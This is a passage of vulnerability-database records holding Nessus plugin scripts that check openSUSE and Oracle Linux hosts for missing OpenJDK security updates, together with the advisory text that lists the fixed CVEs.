script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-demo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"java-1_7_0-openjdk-1.7.0.6-8.14.5\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"java-1_7_0-openjdk-debuginfo-1.7.0.6-8.14.5\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"java-1_7_0-openjdk-debugsource-1.7.0.6-8.14.5\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"java-1_7_0-openjdk-demo-1.7.0.6-8.14.5\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"java-1_7_0-openjdk-demo-debuginfo-1.7.0.6-8.14.5\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"java-1_7_0-openjdk-devel-1.7.0.6-8.14.5\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"java-1_7_0-openjdk-devel-debuginfo-1.7.0.6-8.14.5\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"java-1_7_0-openjdk-javadoc-1.7.0.6-8.14.5\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"java-1_7_0-openjdk-src-1.7.0.6-8.14.5\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_7_0-openjdk / java-1_7_0-openjdk-debuginfo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T03:00:35", "bulletinFamily": "scanner", "description": "java-1_6_0-openjdk was updated to 1.12.5 (bnc#817157)\n\n - Security fixes\n\n - S6657673, CVE-2013-1518: Issues with JAXP\n\n - S7200507: Refactor Introspector internals\n\n - S8000724, CVE-2013-2417: Improve networking\n serialization\n\n - S8001031, CVE-2013-2419: Better font processing\n\n - S8001040, CVE-2013-1537: Rework RMI model\n\n - S8001322: Refactor deserialization\n\n - S8001329, CVE-2013-1557: Augment RMI logging\n\n - S8003335: Better handling of Finalizer thread\n\n - S8003445: Adjust JAX-WS to focus on API\n\n - S8003543, CVE-2013-2415: Improve processing of MTOM\n attachments\n\n - S8004261: Improve input validation\n\n - S8004336, CVE-2013-2431: Better handling of method\n handle intrinsic frames\n\n - S8004986, CVE-2013-2383: Better handling of glyph table\n\n - S8004987, CVE-2013-2384: Improve font layout\n\n - S8004994, CVE-2013-1569: Improve checking of glyph table\n\n - S8005432: Update access to JAX-WS\n\n - S8005943: (process) Improved Runtime.exec\n\n - S8006309: More reliable control panel operation\n\n - S8006435, CVE-2013-2424: Improvements in JMX\n\n - S8006790: Improve checking for windows\n\n - S8006795: Improve font warning messages\n\n - S8007406: Improve accessibility of AccessBridge\n\n - S8007617, CVE-2013-2420: Better validation of images\n\n - S8007667, CVE-2013-2430: Better image reading\n\n - S8007918, CVE-2013-2429: Better image writing\n\n - S8009063, CVE-2013-2426: Improve reliability of\n ConcurrentHashMap\n\n - S8009305, CVE-2013-0401: Improve AWT data transfer\n\n - S8009699, CVE-2013-2421: Methodhandle lookup\n\n - S8009814, CVE-2013-1488: Better driver management\n\n - S8009857, CVE-2013-2422: Problem with plugin\n\n - RH952389: Temporary files created with insecure\n permissions\n\n - Backports\n\n - S7197906: BlockOffsetArray::power_to_cards_back() needs\n to handle > 32 bit shifts\n\n - S7036559: ConcurrentHashMap footprint and contention\n improvements\n\n - S5102804: Memory leak in Introspector.getBeanInfo(Class)\n for custom BeanInfo: Class param (with WeakCache from\n S6397609)\n\n - S6501644: sync LayoutEngine *code* structure to match\n ICU\n\n - S6886358: layout code update\n\n - S6963811: Deadlock-prone locking changes in Introspector\n\n - S7017324: Kerning crash in JDK 7 since ICU layout update\n\n - S7064279: Introspector.getBeanInfo() should release some\n resources in timely manner\n\n - S8004302: javax/xml/soap/Test7013971.java fails since\n jdk6u39b01\n\n - S7133220: Additional patches to JAXP 1.4.5 update 1 for\n 7u4 (partial for S6657673)\n\n - S8009530: ICU Kern table support broken\n\n - Bug fixes\n\n - OJ3: Fix get_stack_bounds memory leak (alternate fix for\n S7197906)\n\n - PR1362: Fedora 19 / rawhide FTBFS SIGILL\n\n - PR1338: Remove dependence on libXp\n\n - PR1339: Simplify the rhino class rewriter to avoid use\n of concurrency\n\n - PR1336: Bootstrap failure on Fedora 17/18\n\n - PR1319: Correct #ifdef to #if\n\n - PR1402: Support glibc < 2.17 with AArch64 patch\n\n - Give xalan/xerces access to their own internal packages.\n\n - New features\n\n - JAXP, JAXWS & JAF supplied as patches rather than drops\n to aid subsequent patching.\n\n - PR1380: Add AArch64 support to Zero\n\n - openjdk-7-src-b147-awt-crasher.patch (bnc#792951)\n\n - fix build for non-jit packages", "modified": "2019-11-02T00:00:00", "id": "OPENSUSE-2013-410.NASL", "href": "https://www.tenable.com/plugins/nessus/74991", "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : java-1_6_0-openjdk (openSUSE-SU-2013:0777-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-410.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74991);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/11/10 11:50:01\");\n\n script_cve_id(\"CVE-2013-0401\", \"CVE-2013-1488\", \"CVE-2013-1518\", \"CVE-2013-1537\", \"CVE-2013-1557\", \"CVE-2013-1569\", \"CVE-2013-2383\", \"CVE-2013-2384\", \"CVE-2013-2415\", \"CVE-2013-2417\", \"CVE-2013-2419\", \"CVE-2013-2420\", \"CVE-2013-2421\", \"CVE-2013-2422\", \"CVE-2013-2424\", \"CVE-2013-2426\", \"CVE-2013-2429\", \"CVE-2013-2430\", \"CVE-2013-2431\");\n\n script_name(english:\"openSUSE Security Update : java-1_6_0-openjdk (openSUSE-SU-2013:0777-1)\");\n script_summary(english:\"Check for the openSUSE-2013-410 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"java-1_6_0-openjdk was updated to 1.12.5 (bnc#817157)\n\n - Security fixes\n\n - S6657673, CVE-2013-1518: Issues with JAXP\n\n - S7200507: Refactor Introspector internals\n\n - S8000724, CVE-2013-2417: Improve networking\n serialization\n\n - S8001031, CVE-2013-2419: Better font processing\n\n - S8001040, CVE-2013-1537: Rework RMI model\n\n - S8001322: Refactor deserialization\n\n - S8001329, CVE-2013-1557: Augment RMI logging\n\n - S8003335: Better handling of Finalizer thread\n\n - S8003445: Adjust JAX-WS to focus on API\n\n - S8003543, CVE-2013-2415: Improve processing of MTOM\n attachments\n\n - S8004261: Improve input validation\n\n - S8004336, CVE-2013-2431: Better handling of method\n handle intrinsic frames\n\n - S8004986, CVE-2013-2383: Better handling of glyph table\n\n - S8004987, CVE-2013-2384: Improve font layout\n\n - S8004994, CVE-2013-1569: Improve checking of glyph table\n\n - S8005432: Update access to JAX-WS\n\n - S8005943: (process) Improved Runtime.exec\n\n - S8006309: More reliable control panel operation\n\n - S8006435, CVE-2013-2424: Improvements in JMX\n\n - S8006790: Improve checking for windows\n\n - S8006795: Improve font warning messages\n\n - S8007406: Improve accessibility of AccessBridge\n\n - S8007617, CVE-2013-2420: Better validation of images\n\n - S8007667, CVE-2013-2430: Better image reading\n\n - S8007918, CVE-2013-2429: Better image writing\n\n - S8009063, CVE-2013-2426: Improve reliability of\n ConcurrentHashMap\n\n - S8009305, CVE-2013-0401: Improve AWT data transfer\n\n - S8009699, CVE-2013-2421: Methodhandle lookup\n\n - S8009814, CVE-2013-1488: Better driver management\n\n - S8009857, CVE-2013-2422: Problem with plugin\n\n - RH952389: Temporary files created with insecure\n permissions\n\n - Backports\n\n - S7197906: BlockOffsetArray::power_to_cards_back() needs\n to handle > 32 bit shifts\n\n - S7036559: ConcurrentHashMap footprint and contention\n improvements\n\n - S5102804: Memory leak in Introspector.getBeanInfo(Class)\n for custom BeanInfo: Class param (with WeakCache from\n S6397609)\n\n - S6501644: sync LayoutEngine *code* structure to match\n ICU\n\n - S6886358: layout code update\n\n - S6963811: Deadlock-prone locking changes in Introspector\n\n - S7017324: Kerning crash in JDK 7 since ICU layout update\n\n - S7064279: Introspector.getBeanInfo() should release some\n resources in timely manner\n\n - S8004302: javax/xml/soap/Test7013971.java fails since\n jdk6u39b01\n\n - S7133220: Additional patches to JAXP 1.4.5 update 1 for\n 7u4 (partial for S6657673)\n\n - S8009530: ICU Kern table support broken\n\n - Bug fixes\n\n - OJ3: Fix get_stack_bounds memory leak (alternate fix for\n S7197906)\n\n - PR1362: Fedora 19 / rawhide FTBFS SIGILL\n\n - PR1338: Remove dependence on libXp\n\n - PR1339: Simplify the rhino class rewriter to avoid use\n of concurrency\n\n - PR1336: Bootstrap failure on Fedora 17/18\n\n - PR1319: Correct #ifdef to #if\n\n - PR1402: Support glibc < 2.17 with AArch64 patch\n\n - Give xalan/xerces access to their own internal packages.\n\n - New features\n\n - JAXP, JAXWS & JAF supplied as patches rather than drops\n to aid subsequent patching.\n\n - PR1380: Add AArch64 support to Zero\n\n - openjdk-7-src-b147-awt-crasher.patch (bnc#792951)\n\n - fix build for non-jit packages\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=817157\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-05/msg00017.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1_6_0-openjdk packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet Driver Manager Privileged toString() Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-openjdk-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-openjdk-demo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-openjdk-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"java-1_6_0-openjdk-1.6.0.0_b27.1.12.5-36.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"java-1_6_0-openjdk-debuginfo-1.6.0.0_b27.1.12.5-36.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"java-1_6_0-openjdk-debugsource-1.6.0.0_b27.1.12.5-36.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"java-1_6_0-openjdk-demo-1.6.0.0_b27.1.12.5-36.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"java-1_6_0-openjdk-demo-debuginfo-1.6.0.0_b27.1.12.5-36.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"java-1_6_0-openjdk-devel-1.6.0.0_b27.1.12.5-36.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"java-1_6_0-openjdk-devel-debuginfo-1.6.0.0_b27.1.12.5-36.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"java-1_6_0-openjdk-javadoc-1.6.0.0_b27.1.12.5-36.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"java-1_6_0-openjdk-src-1.6.0.0_b27.1.12.5-36.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_6_0-openjdk\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T03:14:26", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2013:0770 :\n\nUpdated java-1.6.0-openjdk packages that fix various security issues\nare now available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nMultiple flaws were discovered in the font layout engine in the 2D\ncomponent. An untrusted Java application or applet could possibly use\nthese flaws to trigger Java Virtual Machine memory corruption.\n(CVE-2013-1569, CVE-2013-2383, CVE-2013-2384)\n\nMultiple improper permission check issues were discovered in the\nBeans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted\nJava application or applet could use these flaws to bypass Java\nsandbox restrictions. (CVE-2013-1558, CVE-2013-2422, CVE-2013-1518,\nCVE-2013-1557)\n\nThe previous default value of the java.rmi.server.useCodebaseOnly\nproperty permitted the RMI implementation to automatically load\nclasses from remotely specified locations. An attacker able to connect\nto an application using RMI could use this flaw to make the\napplication execute arbitrary code. (CVE-2013-1537)\n\nNote: The fix for CVE-2013-1537 changes the default value of the\nproperty to true, restricting class loading to the local CLASSPATH and\nlocations specified in the java.rmi.server.codebase property. Refer to\nRed Hat Bugzilla bug 952387 for additional details.\n\nThe 2D component did not properly process certain images. An untrusted\nJava application or applet could possibly use this flaw to trigger\nJava Virtual Machine memory corruption. (CVE-2013-2420)\n\nIt was discovered that the Hotspot component did not properly handle\ncertain intrinsic frames, and did not correctly perform MethodHandle\nlookups. An untrusted Java application or applet could use these flaws\nto bypass Java sandbox restrictions. (CVE-2013-2431, CVE-2013-2421)\n\nIt was discovered that JPEGImageReader and JPEGImageWriter in the\nImageIO component did not protect against modification of their state\nwhile performing certain native code operations. An untrusted Java\napplication or applet could possibly use these flaws to trigger Java\nVirtual Machine memory corruption. (CVE-2013-2429, CVE-2013-2430)\n\nThe JDBC driver manager could incorrectly call the toString() method\nin JDBC drivers, and the ConcurrentHashMap class could incorrectly\ncall the defaultReadObject() method. An untrusted Java application or\napplet could possibly use these flaws to bypass Java sandbox\nrestrictions. (CVE-2013-1488, CVE-2013-2426)\n\nThe sun.awt.datatransfer.ClassLoaderObjectInputStream class may\nincorrectly invoke the system class loader. An untrusted Java\napplication or applet could possibly use this flaw to bypass certain\nJava sandbox restrictions. (CVE-2013-0401)\n\nFlaws were discovered in the Network component", "modified": "2019-11-02T00:00:00", "id": "ORACLELINUX_ELSA-2013-0770.NASL", "href": "https://www.tenable.com/plugins/nessus/68815", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 / 6 : java-1.6.0-openjdk (ELSA-2013-0770)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2013:0770 and \n# Oracle Linux Security Advisory ELSA-2013-0770 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68815);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/09/30 10:58:18\");\n\n script_cve_id(\"CVE-2013-0401\", \"CVE-2013-1488\", \"CVE-2013-1518\", \"CVE-2013-1537\", \"CVE-2013-1557\", \"CVE-2013-1558\", \"CVE-2013-1569\", \"CVE-2013-2383\", \"CVE-2013-2384\", \"CVE-2013-2415\", \"CVE-2013-2417\", \"CVE-2013-2419\", \"CVE-2013-2420\", \"CVE-2013-2421\", \"CVE-2013-2422\", \"CVE-2013-2424\", \"CVE-2013-2426\", \"CVE-2013-2429\", \"CVE-2013-2430\", \"CVE-2013-2431\");\n script_bugtraq_id(58504, 58507, 59131, 59141, 59153, 59159, 59165, 59166, 59167, 59170, 59179, 59184, 59187, 59190, 59194, 59206, 59212, 59219, 59228, 59243);\n script_xref(name:\"RHSA\", value:\"2013:0770\");\n\n script_name(english:\"Oracle Linux 5 / 6 : java-1.6.0-openjdk (ELSA-2013-0770)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2013:0770 :\n\nUpdated java-1.6.0-openjdk packages that fix various security issues\nare now available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nMultiple flaws were discovered in the font layout engine in the 2D\ncomponent. An untrusted Java application or applet could possibly use\nthese flaws to trigger Java Virtual Machine memory corruption.\n(CVE-2013-1569, CVE-2013-2383, CVE-2013-2384)\n\nMultiple improper permission check issues were discovered in the\nBeans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted\nJava application or applet could use these flaws to bypass Java\nsandbox restrictions. (CVE-2013-1558, CVE-2013-2422, CVE-2013-1518,\nCVE-2013-1557)\n\nThe previous default value of the java.rmi.server.useCodebaseOnly\nproperty permitted the RMI implementation to automatically load\nclasses from remotely specified locations. An attacker able to connect\nto an application using RMI could use this flaw to make the\napplication execute arbitrary code. (CVE-2013-1537)\n\nNote: The fix for CVE-2013-1537 changes the default value of the\nproperty to true, restricting class loading to the local CLASSPATH and\nlocations specified in the java.rmi.server.codebase property. Refer to\nRed Hat Bugzilla bug 952387 for additional details.\n\nThe 2D component did not properly process certain images. An untrusted\nJava application or applet could possibly use this flaw to trigger\nJava Virtual Machine memory corruption. (CVE-2013-2420)\n\nIt was discovered that the Hotspot component did not properly handle\ncertain intrinsic frames, and did not correctly perform MethodHandle\nlookups. An untrusted Java application or applet could use these flaws\nto bypass Java sandbox restrictions. (CVE-2013-2431, CVE-2013-2421)\n\nIt was discovered that JPEGImageReader and JPEGImageWriter in the\nImageIO component did not protect against modification of their state\nwhile performing certain native code operations. An untrusted Java\napplication or applet could possibly use these flaws to trigger Java\nVirtual Machine memory corruption. (CVE-2013-2429, CVE-2013-2430)\n\nThe JDBC driver manager could incorrectly call the toString() method\nin JDBC drivers, and the ConcurrentHashMap class could incorrectly\ncall the defaultReadObject() method. An untrusted Java application or\napplet could possibly use these flaws to bypass Java sandbox\nrestrictions. (CVE-2013-1488, CVE-2013-2426)\n\nThe sun.awt.datatransfer.ClassLoaderObjectInputStream class may\nincorrectly invoke the system class loader. An untrusted Java\napplication or applet could possibly use this flaw to bypass certain\nJava sandbox restrictions. (CVE-2013-0401)\n\nFlaws were discovered in the Network component's InetAddress\nserialization, and the 2D component's font handling. An untrusted Java\napplication or applet could possibly use these flaws to crash the Java\nVirtual Machine. (CVE-2013-2417, CVE-2013-2419)\n\nThe MBeanInstantiator class implementation in the OpenJDK JMX\ncomponent did not properly check class access before creating new\ninstances. An untrusted Java application or applet could use this flaw\nto create instances of non-public classes. (CVE-2013-2424)\n\nIt was discovered that JAX-WS could possibly create temporary files\nwith insecure permissions. A local attacker could use this flaw to\naccess temporary files created by an application using JAX-WS.\n(CVE-2013-2415)\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.11.10.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-April/003432.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-April/003439.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1.6.0-openjdk packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet Driver Manager Privileged toString() Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.6.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.6.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.6.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.6.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.6.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.40.1.11.11.0.1.el5_9\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.40.1.11.11.0.1.el5_9\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.40.1.11.11.0.1.el5_9\")) flag++;\nif (rpm_check(release:\"EL5\", 